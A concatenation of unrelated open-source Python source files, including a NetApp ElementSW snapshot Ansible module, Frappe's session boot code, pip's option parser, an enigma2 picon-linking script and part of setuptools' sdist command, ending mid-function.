        self._update("still running...")

    def finish(self, final_status):
        if not self._finished:
            self._update("finished with status '%s'" % (final_status,))
            self._finished = True
@contextlib.contextmanager
def open_spinner(message):
    """Yield a spinner suited to the current output channel.

    The interactive spinner writes directly to sys.stdout rather than
    being routed through the logging system, but acts as if it has level
    INFO (displayed only at INFO or better).  The non-interactive one
    goes through the logging system and is therefore always in sync with
    the logging configuration.
    """
    interactive = (sys.stdout.isatty() and
                   logger.getEffectiveLevel() <= logging.INFO)
    spinner = InteractiveSpinner(message) if interactive \
        else NonInteractiveSpinner(message)
    try:
        with hidden_cursor(sys.stdout):
            yield spinner
    except KeyboardInterrupt:
        spinner.finish("canceled")
        raise
    except Exception:
        spinner.finish("error")
        raise
    else:
        spinner.finish("done")
| mit |
anryko/ansible | lib/ansible/modules/storage/netapp/na_elementsw_snapshot.py | 52 | 13120 | #!/usr/bin/python
# (c) 2018, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or
# https://www.gnu.org/licenses/gpl-3.0.txt)
'''
Element OS Software Snapshot Manager
'''
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = '''
module: na_elementsw_snapshot
short_description: NetApp Element Software Manage Snapshots
extends_documentation_fragment:
- netapp.solidfire
version_added: '2.7'
author: NetApp Ansible Team (@carchi8py) <ng-ansibleteam@netapp.com>
description:
- Create, Modify or Delete Snapshot on Element OS Cluster.
options:
name:
description:
- Name of new snapshot create.
- If unspecified, date and time when the snapshot was taken is used.
state:
description:
- Whether the specified snapshot should exist or not.
choices: ['present', 'absent']
default: 'present'
src_volume_id:
description:
- ID or Name of active volume.
required: true
account_id:
description:
- Account ID or Name of Parent/Source Volume.
required: true
retention:
description:
- Retention period for the snapshot.
- Format is 'HH:mm:ss'.
src_snapshot_id:
description:
- ID or Name of an existing snapshot.
- Required when C(state=present), to modify snapshot properties.
- Required when C(state=present), to create snapshot from another snapshot in the volume.
- Required when C(state=absent), to delete snapshot.
enable_remote_replication:
description:
- Flag, whether to replicate the snapshot created to a remote replication cluster.
- To enable specify 'true' value.
type: bool
snap_mirror_label:
description:
- Label used by SnapMirror software to specify snapshot retention policy on SnapMirror endpoint.
expiration_time:
description:
- The date and time (format ISO 8601 date string) at which this snapshot will expire.
password:
description:
- Element OS access account password
aliases:
- pass
username:
description:
- Element OS access account user-name
aliases:
- user
'''
EXAMPLES = """
- name: Create snapshot
tags:
- elementsw_create_snapshot
na_elementsw_snapshot:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: present
src_volume_id: 118
account_id: sagarsh
name: newsnapshot-1
- name: Modify Snapshot
tags:
- elementsw_modify_snapshot
na_elementsw_snapshot:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: present
src_volume_id: sagarshansivolume
src_snapshot_id: test1
account_id: sagarsh
expiration_time: '2018-06-16T12:24:56Z'
enable_remote_replication: false
- name: Delete Snapshot
tags:
- elementsw_delete_snapshot
na_elementsw_snapshot:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: absent
src_snapshot_id: deltest1
account_id: sagarsh
src_volume_id: sagarshansivolume
"""
RETURN = """
msg:
description: Success message
returned: success
type: str
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
from ansible.module_utils.netapp_elementsw_module import NaElementSWModule
HAS_SF_SDK = netapp_utils.has_sf_sdk()
class ElementOSSnapshot(object):
    """
    Element OS Snapshot Manager

    Wraps the SolidFire SDK to create, modify or delete a snapshot of a
    volume, driven by the Ansible module parameters.
    """

    def __init__(self):
        # Base spec carries the shared connection options (hostname,
        # username/password aliases) for all ElementSW modules.
        self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
        self.argument_spec.update(dict(
            state=dict(required=False, choices=['present', 'absent'], default='present'),
            account_id=dict(required=True, type='str'),
            name=dict(required=False, type='str'),
            src_volume_id=dict(required=True, type='str'),
            retention=dict(required=False, type='str'),
            src_snapshot_id=dict(required=False, type='str'),
            enable_remote_replication=dict(required=False, type='bool'),
            expiration_time=dict(required=False, type='str'),
            snap_mirror_label=dict(required=False, type='str')
        ))

        self.module = AnsibleModule(
            argument_spec=self.argument_spec,
            supports_check_mode=True
        )

        input_params = self.module.params

        self.state = input_params['state']
        self.name = input_params['name']
        self.account_id = input_params['account_id']
        self.src_volume_id = input_params['src_volume_id']
        self.src_snapshot_id = input_params['src_snapshot_id']
        self.retention = input_params['retention']
        # Flips to True when any modifiable property was supplied; selects
        # the modify path (vs. create) in apply().
        self.properties_provided = False

        self.expiration_time = input_params['expiration_time']
        if input_params['expiration_time'] is not None:
            self.properties_provided = True

        self.enable_remote_replication = input_params['enable_remote_replication']
        if input_params['enable_remote_replication'] is not None:
            self.properties_provided = True

        self.snap_mirror_label = input_params['snap_mirror_label']
        if input_params['snap_mirror_label'] is not None:
            self.properties_provided = True

        if self.state == 'absent' and self.src_snapshot_id is None:
            # NOTE(review): the message says "snapshot_id" but the actual
            # module parameter is src_snapshot_id.
            self.module.fail_json(
                msg="Please provide required parameter : snapshot_id")

        if HAS_SF_SDK is False:
            self.module.fail_json(
                msg="Unable to import the SolidFire Python SDK")
        else:
            self.sfe = netapp_utils.create_sf_connection(module=self.module)

        self.elementsw_helper = NaElementSWModule(self.sfe)

        # add telemetry attributes
        self.attributes = self.elementsw_helper.set_element_attributes(source='na_elementsw_snapshot')

    def get_account_id(self):
        """
        Return account id if found

        Resolves the account name/ID parameter to a numeric ID and caches
        it on self.account_id; fails the module if it does not exist.
        """
        try:
            # Update and return self.account_id
            self.account_id = self.elementsw_helper.account_exists(self.account_id)
            return self.account_id
        except Exception as err:
            self.module.fail_json(msg="Error: account_id %s does not exist" % self.account_id, exception=to_native(err))

    def get_src_volume_id(self):
        """
        Return volume id if found, else None.
        """
        src_vol_id = self.elementsw_helper.volume_exists(self.src_volume_id, self.account_id)
        if src_vol_id is not None:
            # Update and return self.volume_id
            self.src_volume_id = src_vol_id
            # Return src_volume_id
            return self.src_volume_id
        return None

    def get_snapshot(self, name=None):
        """
        Return snapshot details if found, else None.

        Looks up by *name* when given, otherwise by self.src_snapshot_id;
        on a hit, caches the numeric ID on self.src_snapshot_id.
        """
        src_snapshot = None
        if name is not None:
            src_snapshot = self.elementsw_helper.get_snapshot(name, self.src_volume_id)
        elif self.src_snapshot_id is not None:
            src_snapshot = self.elementsw_helper.get_snapshot(self.src_snapshot_id, self.src_volume_id)
        if src_snapshot is not None:
            # Update self.src_snapshot_id
            self.src_snapshot_id = src_snapshot.snapshot_id
        # Return src_snapshot
        return src_snapshot

    def create_snapshot(self):
        """
        Create Snapshot on the source volume (optionally based on an
        existing snapshot via src_snapshot_id).
        """
        try:
            self.sfe.create_snapshot(volume_id=self.src_volume_id,
                                     snapshot_id=self.src_snapshot_id,
                                     name=self.name,
                                     enable_remote_replication=self.enable_remote_replication,
                                     retention=self.retention,
                                     snap_mirror_label=self.snap_mirror_label,
                                     attributes=self.attributes)
        except Exception as exception_object:
            self.module.fail_json(
                msg='Error creating snapshot %s' % (
                    to_native(exception_object)),
                exception=traceback.format_exc())

    def modify_snapshot(self):
        """
        Modify Snapshot Properties (expiration, replication, label).
        """
        try:
            self.sfe.modify_snapshot(snapshot_id=self.src_snapshot_id,
                                     expiration_time=self.expiration_time,
                                     enable_remote_replication=self.enable_remote_replication,
                                     snap_mirror_label=self.snap_mirror_label)
        except Exception as exception_object:
            self.module.fail_json(
                msg='Error modify snapshot %s' % (
                    to_native(exception_object)),
                exception=traceback.format_exc())

    def delete_snapshot(self):
        """
        Delete Snapshot identified by self.src_snapshot_id.
        """
        try:
            self.sfe.delete_snapshot(snapshot_id=self.src_snapshot_id)
        except Exception as exception_object:
            self.module.fail_json(
                msg='Error delete snapshot %s' % (
                    to_native(exception_object)),
                exception=traceback.format_exc())

    def apply(self):
        """
        Check, process and initiate snapshot operation
        """
        changed = False
        # NOTE(review): the three flags below are assigned but never used.
        snapshot_delete = False
        snapshot_create = False
        snapshot_modify = False
        result_message = None

        self.get_account_id()

        # Dont proceed if source volume is not found
        if self.get_src_volume_id() is None:
            self.module.fail_json(msg="Volume id not found %s" % self.src_volume_id)

        # Get snapshot details using source volume
        snapshot_detail = self.get_snapshot()

        if snapshot_detail:
            if self.properties_provided:
                # Compare each modifiable property; when a parameter was not
                # supplied, copy the current value back so modify_snapshot()
                # never overwrites a property with None.
                if self.expiration_time != snapshot_detail.expiration_time:
                    changed = True
                else:  # To preserve value in case parameter expiration_time is not defined/provided.
                    self.expiration_time = snapshot_detail.expiration_time

                if self.enable_remote_replication != snapshot_detail.enable_remote_replication:
                    changed = True
                else:  # To preserve value in case parameter enable_remote_replication is not defined/provided.
                    self.enable_remote_replication = snapshot_detail.enable_remote_replication

                if self.snap_mirror_label != snapshot_detail.snap_mirror_label:
                    changed = True
                else:  # To preserve value in case parameter snap_mirror_label is not defined/provided.
                    self.snap_mirror_label = snapshot_detail.snap_mirror_label

        if self.account_id is None or self.src_volume_id is None or self.module.check_mode:
            changed = False
            result_message = "Check mode, skipping changes"
        elif self.state == 'absent' and snapshot_detail is not None:
            self.delete_snapshot()
            changed = True
        elif self.state == 'present' and snapshot_detail is not None:
            if changed:
                self.modify_snapshot()  # Modify Snapshot properties
            elif not self.properties_provided:
                if self.name is not None:
                    snapshot = self.get_snapshot(self.name)
                    # If snapshot with name already exists return without performing any action
                    if snapshot is None:
                        self.create_snapshot()  # Create Snapshot using parent src_snapshot_id
                        changed = True
                else:
                    self.create_snapshot()
                    changed = True
        elif self.state == 'present':
            if self.name is not None:
                snapshot = self.get_snapshot(self.name)
                # If snapshot with name already exists return without performing any action
                if snapshot is None:
                    self.create_snapshot()  # Create Snapshot using parent src_snapshot_id
                    changed = True
            else:
                self.create_snapshot()
                changed = True
        else:
            changed = False
            result_message = "No changes requested, skipping changes"

        self.module.exit_json(changed=changed, msg=result_message)
def main():
    """
    Main function

    Entry point: build the module wrapper and run the requested state
    transition.
    """
    ElementOSSnapshot().apply()


if __name__ == '__main__':
    main()
| gpl-3.0 |
geo-poland/frappe | frappe/boot.py | 31 | 4702 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
bootstrap client session
"""
import frappe
import frappe.defaults
import frappe.widgets.page
from frappe.utils import get_gravatar
def get_bootinfo():
    """Build and return the boot info dict sent to the client session.

    Collects user info, system defaults, desktop modules, icons, home
    page, allowed pages, translations, timezone data and print settings
    into a single frappe._dict.
    """
    frappe.set_user_lang(frappe.session.user)
    bootinfo = frappe._dict()
    hooks = frappe.get_hooks()
    doclist = []

    # user
    get_user(bootinfo)

    # system info
    bootinfo['sysdefaults'] = frappe.defaults.get_defaults()
    bootinfo['server_date'] = frappe.utils.nowdate()

    if frappe.session['user'] != 'Guest':
        bootinfo['user_info'] = get_fullnames()
        bootinfo['sid'] = frappe.session['sid'];

    # home page
    bootinfo.modules = {}
    for app in frappe.get_installed_apps():
        # Apps without a desktop config are silently skipped.
        try:
            bootinfo.modules.update(frappe.get_attr(app + ".config.desktop.get_data")() or {})
        except ImportError:
            pass
        except AttributeError:
            pass

    bootinfo.module_app = frappe.local.module_app
    bootinfo.hidden_modules = frappe.db.get_global("hidden_modules")
    # Icon maps for doctypes and pages that actually declare an icon.
    bootinfo.doctype_icons = dict(frappe.db.sql("""select name, icon from
        tabDocType where ifnull(icon,'')!=''"""))
    bootinfo.doctype_icons.update(dict(frappe.db.sql("""select name, icon from
        tabPage where ifnull(icon,'')!=''""")))

    add_home_page(bootinfo, doclist)
    add_allowed_pages(bootinfo)
    load_translations(bootinfo)
    add_timezone_info(bootinfo)
    load_conf_settings(bootinfo)
    load_print(bootinfo, doclist)

    # ipinfo
    if frappe.session['data'].get('ipinfo'):
        bootinfo['ipinfo'] = frappe.session['data']['ipinfo']

    # add docs
    bootinfo['docs'] = doclist

    # Let installed apps post-process the boot info.
    for method in hooks.boot_session or []:
        frappe.get_attr(method)(bootinfo)

    if bootinfo.lang:
        # Python 2 codebase: ensure lang is a unicode string.
        bootinfo.lang = unicode(bootinfo.lang)

    bootinfo.error_report_email = frappe.get_hooks("error_report_email")

    return bootinfo
def load_conf_settings(bootinfo):
    """Expose whitelisted site-config keys (currently only developer_mode)
    to the client through the boot info."""
    from frappe import conf
    for conf_key in ('developer_mode',):
        if conf_key in conf:
            bootinfo[conf_key] = conf.get(conf_key)
def add_allowed_pages(bootinfo):
    """Collect the Pages the session user may access into bootinfo.page_info,
    keyed by page name with its modified timestamp and title."""
    roles = frappe.get_roles()
    bootinfo.page_info = {}

    # Pages explicitly granted to one of the user's roles.
    for p in frappe.db.sql("""select distinct
        tabPage.name, tabPage.modified, tabPage.title
        from `tabPage Role`, `tabPage`
        where `tabPage Role`.role in (%s)
        and `tabPage Role`.parent = `tabPage`.name""" % ', '.join(['%s'] * len(roles)),
            roles, as_dict=True):
        bootinfo.page_info[p.name] = {"modified": p.modified, "title": p.title}

    # pages where role is not set are also allowed
    for p in frappe.db.sql("""select name, modified, title
        from `tabPage` where
        (select count(*) from `tabPage Role`
        where `tabPage Role`.parent=tabPage.name) = 0""", as_dict=1):
        bootinfo.page_info[p.name] = {"modified": p.modified, "title": p.title}
def load_translations(bootinfo):
    """Attach the session language and, for non-English sessions, the
    translated message dictionary."""
    # English strings are the source strings themselves, so no dict needed.
    if frappe.local.lang != 'en':
        bootinfo["__messages"] = frappe.get_lang_dict("boot")
    bootinfo["lang"] = frappe.lang
def get_fullnames():
    """map of user fullnames

    Returns a dict keyed by user name with fullname, image, gender and
    email for every enabled user.
    """
    ret = frappe.db.sql("""select name,
        concat(ifnull(first_name, ''),
        if(ifnull(last_name, '')!='', ' ', ''), ifnull(last_name, '')) as fullname,
        user_image as image, gender, email
        from tabUser where ifnull(enabled, 0)=1""", as_dict=1)
    d = {}
    for r in ret:
        if not r.image:
            # No uploaded avatar: fall back to a gravatar URL.
            r.image = get_gravatar()
        d[r.name] = r
    return d
def get_startup_js():
    """Concatenate the output of every registered startup_js hook into a
    single newline-joined script string."""
    methods = frappe.get_hooks().startup_js or []
    return "\n".join(frappe.get_attr(method)() or "" for method in methods)
def get_user(bootinfo):
    """get user info"""
    # Full user object for the session user, attached to the boot info.
    bootinfo.user = frappe.user.load_user()
def add_home_page(bootinfo, docs):
    """load home page

    Resolves the configured desktop home page, falling back to 'desktop'
    when missing or not permitted; appends the page doc to *docs*.
    """
    if frappe.session.user == "Guest":
        return
    home_page = frappe.db.get_default("desktop:home_page")
    try:
        page = frappe.widgets.page.get(home_page)
    except (frappe.DoesNotExistError, frappe.PermissionError):
        # Drop the error message that was just logged, then fall back.
        frappe.message_log.pop()
        page = frappe.widgets.page.get('desktop')
    bootinfo['home_page'] = page.name
    docs.append(page)
def add_timezone_info(bootinfo):
    """Ship moment.js timezone data when the user's timezone differs from
    the system timezone, so the client can convert between the two."""
    user = bootinfo.user.get("time_zone")
    system = bootinfo.sysdefaults.get("time_zone")
    if user and user != system:
        import frappe.utils.momentjs
        bootinfo.timezone_info = {"zones": {}, "rules": {}, "links": {}}
        frappe.utils.momentjs.update(user, bootinfo.timezone_info)
        frappe.utils.momentjs.update(system, bootinfo.timezone_info)
def load_print(bootinfo, doclist):
    """Append the Print Settings singleton as a pseudo-doc and load the
    matching print CSS into the boot info."""
    print_settings = frappe.db.get_singles_dict("Print Settings")
    # ":" prefix marks it as a pseudo/singleton doctype for the client.
    print_settings.doctype = ":Print Settings"
    doclist.append(print_settings)
    load_print_css(bootinfo, print_settings)
def load_print_css(bootinfo, print_settings):
    """Resolve the CSS for the configured print style (default "Modern")."""
    bootinfo.print_css = frappe.get_attr("frappe.templates.pages.print.get_print_style")(print_settings.print_style or "Modern")
| mit |
opendatakosovo/vitia-workshop-viz | venv/lib/python2.7/site-packages/pip/baseparser.py | 78 | 12035 | """Base option parser setup"""
import sys
import optparse
import pkg_resources
import os
import textwrap
from distutils.util import strtobool
from pip.backwardcompat import ConfigParser, string_types
from pip.locations import default_config_file, default_log_file
from pip.util import get_terminal_size, get_prog
class PrettyHelpFormatter(optparse.IndentedHelpFormatter):
    """A prettier/less verbose help formatter for optparse."""

    def __init__(self, *args, **kwargs):
        # help position must be aligned with __init__.parseopts.description
        kwargs['max_help_position'] = 30
        kwargs['indent_increment'] = 1
        # Leave a small margin at the terminal's right edge.
        kwargs['width'] = get_terminal_size()[0] - 2
        optparse.IndentedHelpFormatter.__init__(self, *args, **kwargs)

    def format_option_strings(self, option):
        return self._format_option_strings(option, ' <%s>', ', ')

    def _format_option_strings(self, option, mvarfmt=' <%s>', optsep=', '):
        """
        Return a comma-separated list of option strings and metavars.

        :param option: tuple of (short opt, long opt), e.g: ('-f', '--format')
        :param mvarfmt: metavar format string - evaluated as mvarfmt % metavar
        :param optsep: separator
        """
        opts = []

        # Only the first short and first long form are shown.
        if option._short_opts:
            opts.append(option._short_opts[0])
        if option._long_opts:
            opts.append(option._long_opts[0])
        if len(opts) > 1:
            opts.insert(1, optsep)

        if option.takes_value():
            metavar = option.metavar or option.dest.lower()
            opts.append(mvarfmt % metavar.lower())

        return ''.join(opts)

    def format_heading(self, heading):
        # The generic "Options" heading adds noise; drop it.
        if heading == 'Options':
            return ''
        return heading + ':\n'

    def format_usage(self, usage):
        """
        Ensure there is only one newline between usage and the first heading
        if there is no description.
        """
        msg = '\nUsage: %s\n' % self.indent_lines(textwrap.dedent(usage), " ")
        return msg

    def format_description(self, description):
        # leave full control over description to us
        if description:
            # Top-level parser (has .main) lists commands; subcommands
            # show their own description.
            if hasattr(self.parser, 'main'):
                label = 'Commands'
            else:
                label = 'Description'
            # some doc strings have initial newlines, some don't
            description = description.lstrip('\n')
            # some doc strings have final newlines and spaces, some don't
            description = description.rstrip()
            # dedent, then reindent
            description = self.indent_lines(textwrap.dedent(description), " ")
            description = '%s:\n%s\n' % (label, description)
            return description
        else:
            return ''

    def format_epilog(self, epilog):
        # leave full control over epilog to us
        if epilog:
            return epilog
        else:
            return ''

    def indent_lines(self, text, indent):
        new_lines = [indent + line for line in text.split('\n')]
        return "\n".join(new_lines)
class UpdatingDefaultsHelpFormatter(PrettyHelpFormatter):
    """Custom help formatter for use in ConfigOptionParser that updates
    the defaults before expanding them, allowing them to show up correctly
    in the help listing"""

    def expand_default(self, option):
        # Refresh defaults from config files / environment just before the
        # "%default" placeholder is substituted into the help text.
        if self.parser is not None:
            self.parser.update_defaults(self.parser.defaults)
        return optparse.IndentedHelpFormatter.expand_default(self, option)
class CustomOptionParser(optparse.OptionParser):
    """OptionParser with positional group insertion and a flattened view
    of all options (top-level and grouped)."""

    def insert_option_group(self, idx, *args, **kwargs):
        """Insert an OptionGroup at a given position."""
        # add_option_group always appends; move the new group into place.
        group = self.add_option_group(*args, **kwargs)
        del self.option_groups[-1]
        self.option_groups.insert(idx, group)
        return group

    @property
    def option_list_all(self):
        """Get a list of all options, including those in option groups."""
        options = list(self.option_list)
        for grp in self.option_groups:
            options.extend(grp.option_list)
        return options
class ConfigOptionParser(CustomOptionParser):
    """Custom option parser which updates its defaults by checking the
    configuration files and environmental variables"""

    def __init__(self, *args, **kwargs):
        self.config = ConfigParser.RawConfigParser()
        # 'name' doubles as the config-file section for this command.
        self.name = kwargs.pop('name')
        self.files = self.get_config_files()
        self.config.read(self.files)
        assert self.name
        optparse.OptionParser.__init__(self, *args, **kwargs)

    def get_config_files(self):
        """Return the config files to read; PIP_CONFIG_FILE wins when set
        and it exists, otherwise fall back to the default location."""
        config_file = os.environ.get('PIP_CONFIG_FILE', False)
        if config_file and os.path.exists(config_file):
            return [config_file]
        return [default_config_file]

    def update_defaults(self, defaults):
        """Updates the given defaults with values from the config files and
        the environ. Does a little special handling for certain types of
        options (lists)."""
        # Then go and look for the other sources of configuration:
        config = {}
        # 1. config files
        for section in ('global', self.name):
            config.update(self.normalize_keys(self.get_config_section(section)))
        # 2. environmental variables
        config.update(self.normalize_keys(self.get_environ_vars()))
        # Then set the options with those values
        for key, val in config.items():
            option = self.get_option(key)
            if option is not None:
                # ignore empty values
                if not val:
                    continue
                # handle multiline configs
                if option.action == 'append':
                    val = val.split()
                else:
                    option.nargs = 1
                if option.action in ('store_true', 'store_false', 'count'):
                    val = strtobool(val)
                try:
                    val = option.convert_value(key, val)
                except optparse.OptionValueError:
                    # Python 2/3 compatible way to get the exception object.
                    e = sys.exc_info()[1]
                    print("An error occurred during configuration: %s" % e)
                    sys.exit(3)
                defaults[option.dest] = val
        return defaults

    def normalize_keys(self, items):
        """Return a config dictionary with normalized keys regardless of
        whether the keys were specified in environment variables or in config
        files"""
        normalized = {}
        for key, val in items:
            key = key.replace('_', '-')
            if not key.startswith('--'):
                key = '--%s' % key  # only prefer long opts
            normalized[key] = val
        return normalized

    def get_config_section(self, name):
        """Get a section of a configuration"""
        if self.config.has_section(name):
            return self.config.items(name)
        return []

    def get_environ_vars(self, prefix='PIP_'):
        """Returns a generator with all environmental vars with prefix PIP_"""
        for key, val in os.environ.items():
            if key.startswith(prefix):
                yield (key.replace(prefix, '').lower(), val)

    def get_default_values(self):
        """Overriding to make updating the defaults after instantiation of
        the option parser possible, update_defaults() does the dirty work."""
        if not self.process_default_values:
            # Old, pre-Optik 1.5 behaviour.
            return optparse.Values(self.defaults)

        defaults = self.update_defaults(self.defaults.copy())  # ours
        for option in self._get_all_options():
            default = defaults.get(option.dest)
            if isinstance(default, string_types):
                # String defaults still need type conversion/validation.
                opt_str = option.get_opt_string()
                defaults[option.dest] = option.check_value(opt_str, default)
        return optparse.Values(defaults)

    def error(self, msg):
        self.print_usage(sys.stderr)
        self.exit(2, "%s\n" % msg)
# Resolve pip's own version string for "--version".  pip may be run from
# a source checkout without being installed, in which case the
# distribution lookup fails and version falls back to None.
try:
    pip_dist = pkg_resources.get_distribution('pip')
    version = '%s from %s (python %s)' % (
        pip_dist, pip_dist.location, sys.version[:3])
except pkg_resources.DistributionNotFound:
    # when running pip.py without installing
    version = None
def create_main_parser():
    """Build the top-level ConfigOptionParser carrying pip's general
    options ('global' config section)."""
    parser_kw = {
        'usage': '\n%prog <command> [options]',
        'add_help_option': False,
        'formatter': UpdatingDefaultsHelpFormatter(),
        'name': 'global',
        'prog': get_prog(),
    }

    parser = ConfigOptionParser(**parser_kw)
    genopt = optparse.OptionGroup(parser, 'General Options')
    # Stop parsing at the first positional argument so subcommand options
    # are left for the subcommand's own parser.
    parser.disable_interspersed_args()

    # having a default version action just causes trouble
    parser.version = version

    for opt in standard_options:
        genopt.add_option(opt)
    parser.add_option_group(genopt)

    return parser
# General options shared by all pip commands; SUPPRESS_HELP entries are
# internal/deprecated and hidden from --help output.
standard_options = [
    optparse.make_option(
        '-h', '--help',
        dest='help',
        action='help',
        help='Show help.'),

    optparse.make_option(
        # Run only if inside a virtualenv, bail if not.
        '--require-virtualenv', '--require-venv',
        dest='require_venv',
        action='store_true',
        default=False,
        help=optparse.SUPPRESS_HELP),

    optparse.make_option(
        '-v', '--verbose',
        dest='verbose',
        action='count',
        default=0,
        help='Give more output. Option is additive, and can be used up to 3 times.'),

    optparse.make_option(
        '-V', '--version',
        dest='version',
        action='store_true',
        help='Show version and exit.'),

    optparse.make_option(
        '-q', '--quiet',
        dest='quiet',
        action='count',
        default=0,
        help='Give less output.'),

    optparse.make_option(
        '--log',
        dest='log',
        metavar='file',
        help='Log file where a complete (maximum verbosity) record will be kept.'),

    optparse.make_option(
        # Write the log levels explicitly to the log.
        '--log-explicit-levels',
        dest='log_explicit_levels',
        action='store_true',
        default=False,
        help=optparse.SUPPRESS_HELP),

    optparse.make_option(
        # The default log file
        '--local-log', '--log-file',
        dest='log_file',
        metavar='file',
        default=default_log_file,
        help=optparse.SUPPRESS_HELP),

    optparse.make_option(
        # Don't ask for input
        '--no-input',
        dest='no_input',
        action='store_true',
        default=False,
        help=optparse.SUPPRESS_HELP),

    optparse.make_option(
        '--proxy',
        dest='proxy',
        type='str',
        default='',
        help="Specify a proxy in the form [user:passwd@]proxy.server:port."),

    optparse.make_option(
        '--timeout', '--default-timeout',
        metavar='sec',
        dest='timeout',
        type='float',
        default=15,
        help='Set the socket timeout (default %default seconds).'),

    optparse.make_option(
        # The default version control system for editables, e.g. 'svn'
        '--default-vcs',
        dest='default_vcs',
        type='str',
        default='',
        help=optparse.SUPPRESS_HELP),

    optparse.make_option(
        # A regex to be used to skip requirements
        '--skip-requirements-regex',
        dest='skip_requirements_regex',
        type='str',
        default='',
        help=optparse.SUPPRESS_HELP),

    optparse.make_option(
        # Option when path already exist
        '--exists-action',
        dest='exists_action',
        type='choice',
        choices=['s', 'i', 'w', 'b'],
        default=[],
        action='append',
        metavar='action',
        help="Default action when a path already exists: "
             "(s)witch, (i)gnore, (w)ipe, (b)ackup."),

    optparse.make_option(
        '--cert',
        dest='cert',
        type='str',
        default='',
        metavar='path',
        help = "Path to alternate CA bundle."),
]
| gpl-2.0 |
kingvuplus/italysat-enigma4 | tools/create_picon_links.py | 192 | 1273 | #
# create links for picon
# usage: create_picon_links lamedb
# run in picon directory.
# It will read the servicenames from the lamedb and create symlinks
# for the servicereference names.
import os, sys
f = open(sys.argv[1]).readlines()
f = f[f.index("services\n")+1:-3]
while len(f):
ref = [int(x, 0x10) for x in f[0][:-1].split(':')]
name = f[1][:-1]
name = name.replace('\xc2\x87', '').replace('\xc2\x86', '')
# SID:NS:TSID:ONID:STYPE:UNUSED(channelnumber in enigma1)
# X X X X D D
# REFTYPE:FLAGS:STYPE:SID:TSID:ONID:NS:PARENT_SID:PARENT_TSID:UNUSED
# D D X X X X X X X X
refstr = "1:0:%X:%X:%X:%X:%X:0:0:0" % (ref[4], ref[0], ref[2], ref[3], ref[1])
refstr = refstr.replace(':', '_')
filename = name + ".png"
linkname = refstr + ".png"
filename = filename.replace('/', '_').replace('\\', '_').replace('&', '_').replace('\'', '').replace('"', '').replace('`', '')
filename = filename.replace('\n', '')
for i in range(len(filename)):
if ord(filename[i]) > 127:
filename = filename[0:i] + '_' + filename[i + 1:]
if os.access(filename, os.F_OK) and not os.access(linkname, os.F_OK):
os.symlink(filename, linkname)
else:
print "could not find %s (%s)" % (filename, name)
f =f[3:]
| gpl-2.0 |
manojpandey/hackenvision16 | tinybank/tinybank/venv/lib/python2.7/site-packages/setuptools/command/sdist.py | 111 | 7050 | from glob import glob
from distutils import log
import distutils.command.sdist as orig
import os
import sys
import io
from setuptools.extern import six
from setuptools.utils import cs_path_exists
import pkg_resources
# Candidate readme filenames, checked in order of preference.
READMES = 'README', 'README.rst', 'README.txt'

# Fallback file-finder used when no revision-control plugin matches:
# yields no files.
_default_revctrl = list
def walk_revctrl(dirname=''):
    """Find all files under revision control"""
    # Every installed plugin advertising the 'setuptools.file_finders'
    # entry point contributes its own file listing.
    for entry_point in pkg_resources.iter_entry_points('setuptools.file_finders'):
        finder = entry_point.load()
        for path in finder(dirname):
            yield path
class sdist(orig.sdist):
    """Smart sdist that finds anything supported by revision control"""

    user_options = [
        ('formats=', None,
         "formats for source distribution (comma-separated list)"),
        ('keep-temp', 'k',
         "keep the distribution tree around after creating " +
         "archive file(s)"),
        ('dist-dir=', 'd',
         "directory to put the source distribution archive(s) in "
         "[default: dist]"),
    ]

    # No negated option aliases for this command.
    negative_opt = {}
def run(self):
    # Build the manifest via egg_info and reuse its computed file list,
    # plus the generated SOURCES.txt itself.
    self.run_command('egg_info')
    ei_cmd = self.get_finalized_command('egg_info')
    self.filelist = ei_cmd.filelist
    self.filelist.append(os.path.join(ei_cmd.egg_info, 'SOURCES.txt'))
    self.check_readme()

    # Run sub commands
    for cmd_name in self.get_sub_commands():
        self.run_command(cmd_name)

    # Call check_metadata only if no 'check' command
    # (distutils <= 2.6)
    import distutils.command

    if 'check' not in distutils.command.__all__:
        self.check_metadata()

    self.make_distribution()

    # Record the produced archives on the distribution's dist_files list.
    dist_files = getattr(self.distribution, 'dist_files', [])
    for file in self.archive_files:
        data = ('sdist', '', file)
        if data not in dist_files:
            dist_files.append(data)
def __read_template_hack(self):
# This grody hack closes the template file (MANIFEST.in) if an
# exception occurs during read_template.
# Doing so prevents an error when easy_install attempts to delete the
# file.
try:
orig.sdist.read_template(self)
except:
_, _, tb = sys.exc_info()
tb.tb_next.tb_frame.f_locals['template'].close()
raise
# Beginning with Python 2.7.2, 3.1.4, and 3.2.1, this leaky file handle
# has been fixed, so only override the method if we're using an earlier
# Python.
has_leaky_handle = (
sys.version_info < (2, 7, 2)
or (3, 0) <= sys.version_info < (3, 1, 4)
or (3, 2) <= sys.version_info < (3, 2, 1)
)
if has_leaky_handle:
read_template = __read_template_hack
def add_defaults(self):
standards = [READMES,
self.distribution.script_name]
for fn in standards:
if isinstance(fn, tuple):
alts = fn
got_it = 0
for fn in alts:
if cs_path_exists(fn):
got_it = 1
self.filelist.append(fn)
break
if not got_it:
self.warn("standard file not found: should have one of " +
', '.join(alts))
else:
if cs_path_exists(fn):
self.filelist.append(fn)
else:
self.warn("standard file '%s' not found" % fn)
optional = ['test/test*.py', 'setup.cfg']
for pattern in optional:
files = list(filter(cs_path_exists, glob(pattern)))
if files:
self.filelist.extend(files)
# getting python files
if self.distribution.has_pure_modules():
build_py = self.get_finalized_command('build_py')
self.filelist.extend(build_py.get_source_files())
# This functionality is incompatible with include_package_data, and
# will in fact create an infinite recursion if include_package_data
# is True. Use of include_package_data will imply that
# distutils-style automatic handling of package_data is disabled
if not self.distribution.include_package_data:
for _, src_dir, _, filenames in build_py.data_files:
